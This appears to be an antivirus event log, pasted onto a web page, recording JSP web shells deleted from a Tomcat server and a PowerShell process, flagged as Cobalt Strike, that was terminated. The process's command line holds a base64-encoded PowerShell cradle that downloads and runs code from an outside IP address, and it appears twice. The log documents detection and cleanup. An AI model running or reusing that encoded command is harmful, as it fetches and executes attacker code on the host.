|
|
病毒名称:Backdoor/JSP.WebShell.bh
病毒ID:F72F2DCBAC3D5C2C
病毒路径:E:\TRWfe\tomcat\webapps\trwfe\tippay.jsp
操作类型:修改
操作结果:已处理,删除文件
进程ID:4484
操作进程:E:\TRWfe\tomcat\bin\tomcat8.exe
操作进程命令行:e:\TRWfe\tomcat\bin\Tomcat8.exe //RS//TRWfeTomcat
父进程ID:652
父进程:C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2025-11-07 10:58:32,病毒防护,文件实时监控,发现病毒Backdoor/JSP.WebShell.bh, 已处理
病毒名称:Backdoor/JSP.WebShell.bh
病毒ID:F72F2DCBAC3D5C2C
病毒路径:E:\TRWfe\tomcat\webapps\trwfe\tippay4.jsp
操作类型:修改
操作结果:已处理,删除文件
进程ID:4484
操作进程:E:\TRWfe\tomcat\bin\tomcat8.exe
操作进程命令行:e:\TRWfe\tomcat\bin\Tomcat8.exe //RS//TRWfeTomcat
父进程ID:652
父进程:C:\Windows\System32\services.exe
病毒名称:Backdoor/CobaltStrike.l
病毒ID:7E662B652271E28F
虚拟地址:0x00000000C0450000
映像大小:4.0KB
是否完整映像:否
数据流哈希:cafbd78c
操作结果:处理成功,进程已结束
进程ID:1228
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行:powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AOQA0AC4ANQAyADoAMgAxADYANAAvAHgAZwBGAGEAQwAnACkA
父进程ID:2904
父进程:C:\Windows\System32\cmd.exe
父进程命令行:cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AOQA0AC4ANQAyADoAMgAxADYANAAvAHgAZwBGAGEAQwAnACkA"
|
|
收藏